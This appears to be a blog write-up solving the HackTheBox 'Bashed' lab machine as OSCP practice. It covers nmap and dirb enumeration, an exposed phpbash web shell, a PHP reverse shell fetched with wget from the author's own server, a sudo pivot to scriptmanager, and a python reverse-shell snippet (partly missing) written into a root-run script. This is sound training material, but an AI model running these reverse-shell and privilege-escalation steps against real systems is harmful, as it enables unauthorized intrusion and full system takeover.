بسم الله الرحمن الرحيم الحمد الله رب العالمين والصلاة والسلام على خير الخلق أجميعن
Hi everyone this Insha Allah a series of writeups to solve the TJ_Null’s list of HTB boxes, to help me and anyone preparing for the OSCP exam.
this is the first writeup and we will Solve the Bashed Hacthebox machine
1- Network enumeration:
let’s get started with some normal Nmap scanning
nmap —sV -sC 10.129.156.242 -p 80-sV to determine service/version info
-sC to use the default Nmap scripts
- the http port is opend:
2-directory brut force:
doing a directory brut force to discover the hidden directory using Nmap:
nmap — script=http-enum 10.129.156.242 -p 80
or using Dirb:
$ dirb http://10.129.155.176/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Looking in /dev/ we find phpbash.php and phpbash.min.php
when clicking on phpbash.min.php we discover that there is an exposed shell :
login as: ww-data
there are two users “arrexel” and “scriptmanager” we can read the flag of the two users but we can not read the flag of the root user if we don’t get their privilege
so we need to escalate our privilege to see the flag o the root but before that, we should enumerate the system to underside it and look for the most privilege escalation attack in the Linux system.
if You don’t familiar with the Linux privilege education You can look at this room from Tryackem it’s useful, I learn a lot from it:
Any user can check its current situation related to root privileges using the
sudo -l command.
https://gtfobins.github.io/ is a valuable source that provides information on how any program, on which you may have sudo rights, can be used.
so there 2 users we can access their privilege without a password but before that, we need a PHP reverse shell.
You can download this shell:
Change the port and IP
go to the upload directory as in the screen below.
1-run a simple python server on Your machine:
$ python3 -m http.server 12344
upload the shell using Wget:
$ wget 10.10.14.63:12344/revers.php
Go to the browser and open the shell file.
and Alhamdu Lilah, the reverse shell was succeeded.
let’s upgrade our shell with some Python code.
$ python -c "import pty; pty.spawn('/bin/bash');"
www-data@bashed:/$ ls -la
.A directory named “scripts” that only the “scriptmanager” account has to write/execute permissions. so we need to get their privilege using the fowling command:
www-data@bashed:/$ sudo -u scriptmanager bash
scriptmanager@bashed:/$scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la
drwxrwxr — 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r — r — 1 scriptmanager scriptmanager 217 Mar 15 10:49 test.py
-rw-r — r — 1 root root 12 Mar 15 10:38 test.txt
so there are two files “test.py” and “test.txt” and when we focus on the time we discovered that “test.txt” is changed before some time.
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
scriptmanager@bashed:/scripts$scriptmanager@bashed:/scripts$ cat test.txt
so this is the content of the two flies. the ” test.py” is open “test.txt” and write these words.
so we can use this function to do a privilege escalation attack using this python shell after putting our shell in the “text.py” file, it’s like the Cron Jobs privilege escalation attack.
So let’s Fowling those steps
1- open a new Netcat connection with a different port:
2- adding our python shell to the “text.py” file:
echo 'import socket,subprocess,os
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ' >test.py
and ALhamdu LI Allah, we got the shell:
getting the flag from the root directory:
Thank You for reading this write-up I hope you found it useful.
You can flowe me on: